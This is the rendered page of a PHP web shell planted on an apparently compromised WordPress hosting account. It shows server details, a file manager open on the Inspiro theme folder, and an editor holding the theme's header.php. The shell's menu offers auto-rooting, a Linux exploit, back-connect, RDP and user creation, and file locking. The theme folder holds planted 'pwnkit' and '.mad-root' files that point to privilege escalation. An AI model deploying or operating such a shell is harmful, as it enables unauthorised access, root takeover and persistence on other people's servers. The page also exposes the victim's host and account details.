Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.129.20.3 | : 216.73.217.63
Cant Read [ /etc/named.conf ]
8.4.22
chloega
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
chloega /
www /
wp-content /
themes /
inspiro /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
patterns
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
927
B
-rw-r--r--
LICENSE
17.67
KB
-rw-r--r--
README.md
11.53
KB
-rw-r--r--
README_DEV.md
1.29
KB
-rw-r--r--
archive.php
1.33
KB
-rw-r--r--
comments.php
4.54
KB
-rw-r--r--
footer.php
840
B
-rw-r--r--
functions.php
4.28
KB
-rw-r--r--
header.php
1.8
KB
-rw-r--r--
index.php
1.9
KB
-rw-r--r--
page.php
1.23
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
10.64
KB
-rw-r--r--
rtl.css
480
B
-rw-r--r--
screenshot.png
620.53
KB
-rw-r--r--
search.php
1.54
KB
-rw-r--r--
searchform.php
917
B
-rw-r--r--
sidebar.php
1.23
KB
-rw-r--r--
single.php
1.58
KB
-rw-r--r--
style.css
2.07
KB
-rw-r--r--
theme.json
9.05
KB
-rw-r--r--
wpml-config.xml
297
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Inspiro * @subpackage Inspiro_Lite * @since Inspiro 1.0.0 * @version 1.0.0 */ ?><!DOCTYPE html> <html <?php language_attributes(); ?> class="no-js"> <head> <meta charset="<?php bloginfo( 'charset' ); ?>" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content"><?php esc_html_e( 'Skip to content', 'inspiro' ); ?></a> <header id="masthead" class="site-header" role="banner"> <?php get_template_part( 'template-parts/navigation/navigation', 'primary' ); ?> </header><!-- #masthead --> <?php $hero_show = inspiro_get_theme_mod( 'hero_enable' ); ?> <?php // Display custom header only on first page. if (!is_page_template( 'page-templates/homepage-no-hero.php' )) { if ( isset( $paged ) && $paged < 2 && $hero_show ) { if ( is_front_page() && is_home() ) { // Default homepage. get_template_part( 'template-parts/header/header', 'image' ); } elseif ( is_front_page() ) { // static homepage. get_template_part( 'template-parts/header/header', 'image' ); } elseif ( is_page() && inspiro_is_frontpage()) { get_template_part( 'template-parts/header/header', 'image' ); } elseif ( is_page_template( 'page-templates/homepage-builder-bb.php' ) ) { get_template_part( 'template-parts/header/header', 'image' ); } } } ?> <div class="site-content-contain"> <div id="content" class="site-content">
Close